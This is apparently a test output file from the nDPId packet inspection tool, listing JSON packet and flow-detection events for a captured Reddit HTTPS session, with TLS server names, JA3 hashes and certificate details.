-00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686100,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdBugO8IeJd6tioBJXgCN0AAACBAV4AQMDAwQCCArC1zjGqXTmBA=="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686100,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdBGVsk6UAYN+NoBJXgFfrAAACBAV4AQMDAwQCCArC1zjGqXTmAA=="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686100,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdCGPwRcUBxWYioBJXgB9GAAACBAV4AQMDAwQCCArC1zjGqXTmBA=="} 
-00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":457,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686100,"pkt":"qtsDr8lk5EKm5WPyht1gBAJCACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QYBu4l3q2LoDvCIgBAB+6dhAAABAQgKqXTmKMLXOMY="} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686100,"pkt":"qtsDr8lk5EKm5WPyht1gCVnRACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QQBuwBg341lbJOmgBAB+9vUAAABAQgKqXTmKMLXOMY="} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686100,"pkt":"qtsDr8lk5EKm5WPyht1gAj4aACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QgBuwHFZiJj8EXGgBAB+6MzAAABAQgKqXTmKMLXOMY="} 
-00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686100,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdCnzgy8YZci18oBJXgKFLAAACBAV4AQMDAwQCCArC1zjGqXTmBA=="} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686100,"pkt":"qtsDr8lk5EKm5WPyht1gCQMdACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QoBuxlyLXx84MvHgBAB+yU5AAABAQgKqXTmKMLXOMY="} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":462,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686100,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":463,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686100,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686100,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686101,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686101,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1605291686102,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686102,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdDA6Vo\/hs46MGoBJXgG5nAAACBAV4AQMDAwQCCArC1zjGqXTmBA=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1605291686102,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686102,"pkt":"qtsDr8lk5EKm5WPyht1gBZ0wACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QwBu2zjowYOlaP5gBAB+\/JSAAABAQgKqXTmKsLXOMY="} 
-00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":468,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686103,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686103,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":470,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686035,"flow_last_seen":1605291686105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686105,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":475,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686106,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686106,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} -01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":490,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686110,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686110,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01281{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":492,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686035,"flow_last_seen":1605291686110,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686110,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} 
-01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":498,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686127,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686127,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":501,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":502,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} 
-01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":508,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} -01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":510,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":516,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686129,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686129,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} 
-00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1605291686129,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686129,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdELkPzEPbiYGyoBJXgE4hAAACBAV4AQMDAwQCCArC1zjcqXTmGA=="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":519,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1605291686129,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686129,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdDvdaN0mUbYB0oBJXgO0tAAACBAV4AQMDAwQCCArC1zjbqXTmGA=="} -01008{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":521,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686129,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686129,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":524,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1605291686129,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686129,"pkt":"qtsDr8lk5EKm5WPyht1gCcfOACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3RABu9uJgbK5D8xEgBAB+9IFAAABAQgKqXTmRcLXONw="} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1605291686129,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686129,"pkt":"qtsDr8lk5EKm5WPyht1gBTHMACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3Q4Bu5RtgHT3WjdKgBAB+3ESAAABAQgKqXTmRcLXONs="} -00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686084,"flow_last_seen":1605291686129,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686129,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
